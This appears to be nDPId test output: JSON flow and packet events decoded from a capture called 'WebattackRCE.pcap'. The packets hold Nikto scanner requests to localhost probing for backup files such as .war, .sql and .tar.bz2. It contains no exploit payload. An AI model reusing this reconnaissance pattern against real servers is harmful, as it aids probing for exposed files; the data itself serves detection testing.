+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 